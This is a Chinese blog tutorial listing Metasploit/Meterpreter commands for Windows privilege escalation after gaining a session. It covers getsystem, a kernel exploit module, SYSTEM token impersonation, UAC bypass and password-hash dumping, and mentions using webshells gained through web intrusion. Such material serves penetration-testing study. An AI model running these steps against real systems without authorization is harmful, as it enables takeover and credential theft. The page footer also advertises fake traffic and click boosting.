meterpreter提权几种方式

由于很多人都想知道meterpreter提权是怎么样的?这里就再简单的说一下吧!

反弹shell

 

一、getsystem提权

直接getsystem提权,最常用简单的办法;不过对于现在用的Metasploit Framework来说,此命令已经不好用了,会出现“Unknown command: getsystem.”,然后再用命令“use priv",又会出现“Failed to load extension: No module of the name priv found”。

meterpreter > getsystem

 

二、exp提权

很多人可能不知道什么是exp提权?特意简单的说一下:溢出提权,也就是exp提权。

以windows举例,溢出提权说白了,就是我们windows系统中出现的一些漏洞,漏洞的种类很多,所以大家在日常生活中,要经常对电脑更新补丁啊!而我们利用这些系统中存在的漏洞写出的 exp ,也就是漏洞利用工具,然后来辅助提权。

meterpreter > background //先后台运行会话[*] Backgrounding session 1…
msf > use post/windows/escalate/ms10_073_kbdlayout
msf > show options
msf > set session 1 //设置要使用的会话
msf post(ms10_073_kbdlayout) > exploit

注意:如果创建了一个system进程,就可以立马sessions 1进入会话,然后ps查看进程,使用migrate   pid注入到进程。不过,现在用的Metasploit Framewor使用“migrate”命令会出现“Error running command migrate: NoMethodError undefined method `pid' for nil:NilClass”的提示。

 

或者直接使用以下命令:

meterpreter > run post/windows/escalate/ms10_073_kbdlayout

 

三、盗取令牌

meterpreter > use incognito //进入这个模块
meterpreter > list_tokens –u //查看存在的令牌
meterpreter > impersonate_token NT AUTXXXX\SYSTEM //令牌是DelegationTokens一列,getuid查看,两个斜杠

注意:只有具有“模仿安全令牌权限”的账户才能去模仿别人的令牌,一般大多数的服务型账户(IIS、MSSQL等)有这个权限,大多数用户级的账户没有这个权限。一般从web拿到的webshell都是IIS服务器权限,是具有这个模仿权限的,建好的账户没有这个权限。使用菜刀(IIS服务器权限)反弹meterpreter是服务型权限。

 

四、Bypassuac

msf > use exploit/windows/local/bypassuac //32位与64位一样,其他几个模块也一样
msf > show options
msf > set session 4
msf > run //成功后会返回一个新的session,进入新会话,发现权限没变,使用getsystem即可完成提权

 

五、Hash

meterpreter > run post/windows/gather/smart_hashdump //读取hash这种做法最智能,效果最好。

 

总结:提权的方式真的是太多了,而且还有windows提权和linux提权,方法也各有不同。

    A+
发布日期:2019年04月12日 13:08:16  所属分类:Metasploit
最后更新时间:2019-04-12 21:45:16
评分: (1 票;平均数5.00 ;最高评分 5 ;用户总数1;总得分 5;百分比100.00)
付杰
花牛苹果 甘肃天水 李宏恩家自种 1斤 包邮
花牛苹果 甘肃天水 李宏恩家自种 1斤 包邮
  • ¥ 6.8元
  • 市场价:8.8元
免费SSL证书 HTTPS申请 安装 配置 支持通配符*
免费SSL证书 HTTPS申请 安装 配置 支持通配符*
  • ¥ 199.9元
  • 市场价:20000元
服务器管理面板/主机控制面板“安装”服务
服务器管理面板/主机控制面板“安装”服务
  • ¥ 9.9元
  • 市场价:49.9元
刷流量 刷人气 刷点击 刷收藏 刷APP关键词
刷流量 刷人气 刷点击 刷收藏 刷APP关键词
  • ¥ 1.0元
  • 市场价:9.9元

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: